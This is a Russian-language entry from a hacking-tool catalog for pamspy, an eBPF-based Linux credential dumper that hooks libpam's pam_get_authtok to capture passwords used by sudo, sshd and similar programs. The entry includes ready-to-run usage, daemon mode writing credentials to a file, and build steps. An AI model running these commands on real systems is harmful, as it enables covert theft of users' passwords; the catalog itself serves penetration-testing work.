Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
pamspy — Дампер учетных данных для Linux с использованием eBPF | Kitploit
Инструменты/GitHubGitHub/citronneur/pamspy
Тестирование на ПроникновениеАутентификация
GitHubcitronneur/pamspy

pamspy

Дампер учетных данных для Linux с использованием eBPF

Репозиторий
1.2k6342 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

pamspy -- Сборщик учётных данных для Linux

pamspy использует технологии eBPF для выполнения работы, аналогичной 3snake.

Он отслеживает определённую пользовательскую функцию в библиотеке PAM (Pluggable Authentication Modules), используемой многими критическими приложениями для обработки аутентификации, такими как:

  • sudo
  • sshd
  • passwd
  • gnome
  • x11
  • и многие другие...

Demo

Как запустить?

pamspy собран как статический бинарный файл без каких-либо зависимостей и доступен на странице релизов.

root@kitploit:~
Usage: pamspy [OPTION...]
pamspy

Uses eBPF to dump secrets use by PAM (Authentication) module
By hooking the pam_get_authtok function in libpam.so

USAGE: ./pamspy -p $(/usr/sbin/ldconfig -p | grep libpam.so | cut -d ' ' -f4) -d /var/log/trace.0

  -d, --daemon=PATH TO OUTPUT CREDENTIALS
                             Start pamspy in daemon mode and output in the file
                             passed as argument
  -p, --path=PATH            Path to the libpam.so file
  -r, --print-headers        Print headers of the program
  -v, --verbose              Verbose mode
  -?, --help                 Give this help list
      --usage                Give a short usage message
  -V, --version              Print program version

Mandatory or optional arguments to long options are also mandatory or optional
for any corresponding short options.

Report bugs to .

Поскольку pamspy зависит от libpam, необходимо указать путь, где libpam установлен в вашей системе. Чтобы узнать, где установлен libpam, выполните следующую команду:

root@kitploit:~
> /usr/sbin/ldconfig -p | grep libpam.so | cut -d ' ' -f4
/lib/x86_64-linux-gnu/libpam.so.0

После получения пути вы можете запустить pamspy:

root@kitploit:~
> ./pamspy -p /lib/x86_64-linux-gnu/libpam.so.0

Простой способ запуска pamspy — использовать следующую команду:

root@kitploit:~
> ./pamspy -p $(/usr/sbin/ldconfig -p | grep libpam.so | cut -d ' ' -f4)

pamspy также можно запустить как демон, указав выходной файл, в который будут записаны учётные данные:

root@kitploit:~
./pamspy -p $(/usr/sbin/ldconfig -p | grep libpam.so | cut -d ' ' -f4) -d /tmp/credentials

Как собрать?

Для сборки статического бинарного файла требуются сторонние программы. Для eBPF нужен clang для компиляции кода C в eBPF CO-RE код. Также используется bpftool для создания скелета из eBPF-программы, чтобы включить его в нашу пользовательскую программу. Кроме того, нужен libelf для поиска правильного символа в libpam.

root@kitploit:~
sudo apt install make clang-11 gcc libelf-dev bpftool

Затем просто соберите!

root@kitploit:~
git clone https://github.com/citronneur/pamspy --recursive
cd pamspy/src
make

Как это работает?

pamspy загружает eBPF-программу пользовательского уровня для возврата (return probe), чтобы перехватить функцию pam_get_authtok из libpam.so. PAM расшифровывается как "Pluggable Authentication Modules" и имеет гибкую архитектуру для управления различными типами аутентификации в Linux.

Каждый раз, когда процесс аутентификации пытается проверить нового пользователя, вызывается pam_get_authtok, и в этот момент мы перехватываем содержимое критически важных секретов!

Просто! Наслаждайтесь!

Благодарности и ссылки

Спасибо @blendin за инструмент 3snake !!!

Скачать инструмент